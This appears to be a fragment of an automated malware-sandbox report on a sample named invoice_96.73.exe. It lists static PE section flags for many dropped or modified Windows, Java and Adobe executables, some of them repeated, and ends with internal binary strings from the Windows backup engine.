      Source: kinit.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: klist.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: ktab.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: orbd.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: pack200.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: policytool.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: rmid.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: rmiregistry.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: servertool.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: ssvagent.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: tnameserv.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: unpack200.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: AcroBroker.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: RdrCEF.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: 64BitMAPIBroker.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: reader_sl.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: wow_helper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: Au3Info.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: Au3Info_x64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: AutoIt3Help.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: AutoIt3_x64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: RdrServicesUpdater.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: AcroRd32.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: OSE.EXE.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: DW20.EXE.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: invoice_96.73.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: FlashPlayerUpdateService.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: aspnet_state.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: AcroRd32Info.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: AcroTextExtractor.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: ADelRCP.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: AdobeCollabSync.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: arh.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: WCChromeNativeMessagingHost.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: Eula.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: FullTrustNotifier.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: LogTransport2.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: 32BitMAPIBroker.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: mscorsvw.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: mscorsvw.exe1.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: dllhost.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: ehrecvr.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: ehsched.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: FXSSVC.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: elevation_service.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: ieetwcollector.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: maintenanceservice.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: msdtc.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: msiexec.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: perfhost.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: Locator.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: snmptrap.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: sppsvc.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: vds.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: VSSVC.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: wbengine.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: WmiApSrv.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: wmpnetwk.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: SearchIndexer.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: ose.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: setup.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: dwtrig20.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: CCleaner.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: CCleaner64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: jabswitch.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: java-rmi.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: java.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: javacpl.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: javaw.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: javaws.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: jjs.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: jp2launcher.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: keytool.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: kinit.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: klist.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: ktab.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: orbd.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: pack200.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: policytool.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: rmid.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: rmiregistry.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: servertool.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: ssvagent.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: tnameserv.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: unpack200.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: AcroBroker.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: RdrCEF.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: 64BitMAPIBroker.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: reader_sl.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: wow_helper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: Au3Info.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: Au3Info_x64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: AutoIt3Help.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: AutoIt3_x64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: RdrServicesUpdater.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: AcroRd32.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: OSE.EXE.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: DW20.EXE.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: wbengine.exe.2.drBinary string: YK _hImpersonationToken != INVALID_HANDLE_VALUEd:\w7rtm\base\stor\blb\blbimg\blbimg.cxxReadHandle != INVALID_HANDLE_VALUEWriteHandle != INVALID_HANDLE_VALUEpdwFlagsFveGetStatusWwszDeviceName%ws\%wsExtentLength > 0pCurrentListEntry->Length > 0pbRecomputeNeededpBadClusExtentsBeforeRecoverypBpb\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy{\System Volume Information\*{3808876B-C176-4e48-B7AE-04046E6CC752}\System Volume Information\readBuffer != NULL{{3808876B-C176-4e48-B7AE-04046E6CC752}!IsListEmpty(&diffsInSource)\pagefile.sys\hiberfil.sysBackupFileNameUniqueIdWin32ErrorCodeIoState[CurrentBuffer] == BLBIMGI_IO_STATE_WRITINGoffset[i] < volumeSizet.QuadPart < restoreContext->VolumeSize\\?\GLOBALROOT\Device\BlbControlImpersonationToken != INVALID_HANDLE_VALUEoutputBuf->MultiSzLength % sizeof (WCHAR) == 0.\%ws_compressionReadAheadBufferOverlapped.hEventd:\w7rtm\base\stor\blb\blbimg\backfile.cxx_handle != NULL_isCompactForm == FALSE_handle == NULLblockNumberOnDisk != 0xFFFFFFFFdiskOffset >= volumeStartOffsetvolumeBlockOffsetBitLength >= bitsInvolumeStartOffset_batRelativeVolumePointer >= BLBIMGF_SECTOR_SIZE!_isCompactForm_batList[diskBlockOffset] != 0xFFFFFFFFdiskBlockOffset < _numberOfBatEntriesoffsetInDiskBlock % BLBIMGI_BYTES_PER_BLOCK == 0prevBlock >= 0(length == BLBIMGI_BYTES_PER_BLOCK) || isLastBlockInSource_currentFilePointer < _maximumFileSize!_isReadInitialized_currentFileSize >= _existingFileSizebitsInvolumeStartOffset < BLBIMGI_BITS_PER_BAT_BLOCKbisMasterBootRecord_currentFilePointer <= _maximumFileSize_newVhdFormatconectixvsimcxsparsewriteOffSet - Length + _lastBlockSize == _volumeSizereadOffset.QuadPart%BLBIMGF_SECTOR_SIZE == 0readOffset.QuadPart/BLBIMGF_SECTOR_SIZE >= _firstBlockSectorreadOffset.QuadPart/BLBIMGF_SECTOR_SIZE <= _maximumFileSizelen == _sectorSized:\w7rtm\base\stor\blb\blbimg\snapvol.cxx_currentBitNumber == 0_currentBlockListNumber < _batBlockListLength_batBlockList[_currentBlockListNumber] != 0xFFFFFFFFbytesRead == lensplitReadulReadSize > 0_blockBitmap.SizeOfBitMap >= 1.
      Source: wbengine.exe.2.drBinary string: Element\Device\HarddiskVolume
